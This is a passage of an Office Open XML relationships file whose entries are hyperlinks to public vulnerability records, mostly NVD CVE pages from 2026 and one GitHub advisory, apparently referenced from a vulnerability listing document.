Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79407" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81270" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84219" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85045" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85155" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86250" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19683" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62906" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15431" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85028" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15984" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16649" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18406" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19224" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19769" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34968" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71506" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77233" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77263" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77830" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78438" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83595" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83625" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7jx3-jqcp-hhgc" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37277" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-35499" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29419" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16281" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19051" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52762" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53603" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53604" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56702" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71415" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71505" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71507" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71508" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71509" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71511" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76223" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77125" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77939" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79745" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79747" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80117" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81404" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84192" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84205" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85163" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85164" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85170" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85451" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85580" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85582" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85590" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85654" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85787" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86091" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86111" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86113" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86116" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86175" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 